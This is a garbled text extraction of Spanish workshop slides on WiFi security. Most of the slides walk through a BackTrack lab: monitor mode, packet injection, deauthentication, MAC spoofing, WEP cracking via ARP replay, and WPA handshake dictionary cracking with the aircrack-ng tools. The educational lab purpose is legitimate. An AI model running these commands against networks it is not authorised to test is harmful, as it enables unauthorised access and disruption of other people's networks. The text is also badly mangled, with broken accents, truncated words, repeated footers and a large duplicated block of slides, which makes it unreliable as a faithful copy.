Interrupcioacuten de los servicios

VirusMails anoacutenimos con agresiones

Incumplimiento de leyes y regulaciones

Robo o extraviacuteo de notebooks palms

Robo de informacioacuten

Destruccioacuten de soportes documentales

Acceso clandestino a redes

Intercepcioacuten de comunicaciones voz ywireless

Programas ldquobomba troyanosrdquo

Acceso indebido a documentos impresos

Agujeros de seguridad de redes conectadas

Falsificacioacuten de informacioacuten paraterceros

Indisponibilidad de informacioacuten clave

Spamming

Ingenieriacute a social

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1094

Vulnerabilidad

bull Error o mala configuracioacuten de Software oHardware que individuos mal intencionadospueden explotar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1194

Vulnerabilidad

bull httpwwwsecurityfocuscom

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1294

Analogiacutea de Seguridad

Acepto el riesgo

Minimizo el riesgo

Transfiero el riesgo

Amenaza

Vulnerabilidad

Riesgo

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1394

Conexioacuten a Medios Alaacutembricos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1494

Conexioacuten a Redes inalaacutembricas

bull WiFi (80211x)bull 80211abull 80211bbull

80211gbull 80211n

bull Timo Arnall Joslashrn Knutsen and Einar SneveMartinussen

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1594

ClapgnagmlEncripcioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1694

Encripcioacuten

bull Privacidadbull Autenticacioacuten

bull Integridad

bull No repudio

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1794

Encripcioacuten

bull Encripcioacuten Simeacutetrica

bull Encripcioacuten Asimeacutetrica

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1894

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994

II- Armando el Laboratorio

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094

Paraacutemetros del laboratorio

bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo

bull Abierto

bull Oculto

bull WEP

bull WPAWPA2

ndash MAC Addressbull 687F7404BE78 (LAN)

bull 687F7404BE7A (WLAN)

ndash Direcciones IPbull WL_AP1 192168165

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294

III- Conociendo BackTrack

bull

Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado

en un equipo de coacutemputo

bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades

ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394

Iniciando con BackTrack

bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD

bull Hacer clic en BackTrack Text ndash Default Boot Text

Mode

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494

Iniciando con BackTrack

bull Teclea el comando startx

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594

Iniciando con BackTrack

bull GUI de BackTrack 5

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694

Configurando la tarjeta

inalaacutembrica

bull Abre una terminal de consolabull Teclea iwconfig

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794

Configurando la tarjeta

inalaacutembrica

bull Teclea ifconfig wlan0 up

bull Teclea ifconfig wlan0

bull Anota la direccioacuten MAC de tu tarjeta

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894

Conectaacutendose al AP

bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994

Conectaacutendose al AP

bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo

bull Teclea iwconfig wlan0

bull Verifica que tengas la MAC del Access Point

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094

Configurando una IP de la red

bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up

bull Verifica tecleando ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194

Probando conectividad

bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC

bull Abre un navegador e intenta navegar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394

IV- Seguridad WLAN

bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing

ndash Packet injection

ndash Sniffing

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494

Capas OSITCP

bull Frames

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594

Frames WLAN (Beacons)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694

Campo Type

bull Frames de Administracioacuten ndash Authentication

ndash De-authentication

ndash Association Request Response

ndash maacutes

bull Frames de Control

ndash Request to Send (RTS)

ndash

Clear to Send (CTS) ndash Acknowledgement (ACK)

bull Frames de Datos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794

Frames Sniffing

bull Utilizaremos Wireshark ndash Airodump-NG

ndash Tcpdump

ndash Tshark

bull Reinicia tu equipo para que sean configuraciones

desde cero

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 10: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1094

Vulnerabilidad

bull Error o mala configuracioacuten de Software oHardware que individuos mal intencionadospueden explotar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1194

Vulnerabilidad

bull httpwwwsecurityfocuscom

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1294

Analogiacutea de Seguridad

Acepto el riesgo

Minimizo el riesgo

Transfiero el riesgo

Amenaza

Vulnerabilidad

Riesgo

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1394

Conexioacuten a Medios Alaacutembricos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1494

Conexioacuten a Redes inalaacutembricas

bull WiFi (80211x)bull 80211abull 80211bbull

80211gbull 80211n

bull Timo Arnall Joslashrn Knutsen and Einar SneveMartinussen

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1594

ClapgnagmlEncripcioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1694

Encripcioacuten

bull Privacidadbull Autenticacioacuten

bull Integridad

bull No repudio

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1794

Encripcioacuten

bull Encripcioacuten Simeacutetrica

bull Encripcioacuten Asimeacutetrica

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1894

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994

II- Armando el Laboratorio

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094

Paraacutemetros del laboratorio

bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo

bull Abierto

bull Oculto

bull WEP

bull WPAWPA2

ndash MAC Addressbull 687F7404BE78 (LAN)

bull 687F7404BE7A (WLAN)

ndash Direcciones IPbull WL_AP1 192168165

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294

III- Conociendo BackTrack

bull

Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado

en un equipo de coacutemputo

bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades

ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394

Iniciando con BackTrack

bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD

bull Hacer clic en BackTrack Text ndash Default Boot Text

Mode

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494

Iniciando con BackTrack

bull Teclea el comando startx

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594

Iniciando con BackTrack

bull GUI de BackTrack 5

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694

Configurando la tarjeta

inalaacutembrica

bull Abre una terminal de consolabull Teclea iwconfig

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794

Configurando la tarjeta

inalaacutembrica

bull Teclea ifconfig wlan0 up

bull Teclea ifconfig wlan0

bull Anota la direccioacuten MAC de tu tarjeta

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894

Conectaacutendose al AP

bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994

Conectaacutendose al AP

bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo

bull Teclea iwconfig wlan0

bull Verifica que tengas la MAC del Access Point

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094

Configurando una IP de la red

bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up

bull Verifica tecleando ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194

Probando conectividad

bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC

bull Abre un navegador e intenta navegar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394

IV- Seguridad WLAN

bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing

ndash Packet injection

ndash Sniffing

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494

Capas OSITCP

bull Frames

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594

Frames WLAN (Beacons)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694

Campo Type

bull Frames de Administracioacuten ndash Authentication

ndash De-authentication

ndash Association Request Response

ndash maacutes

bull Frames de Control

ndash Request to Send (RTS)

ndash

Clear to Send (CTS) ndash Acknowledgement (ACK)

bull Frames de Datos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794

Frames Sniffing

bull Utilizaremos Wireshark ndash Airodump-NG

ndash Tcpdump

ndash Tshark

bull Reinicia tu equipo para que sean configuraciones

desde cero

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

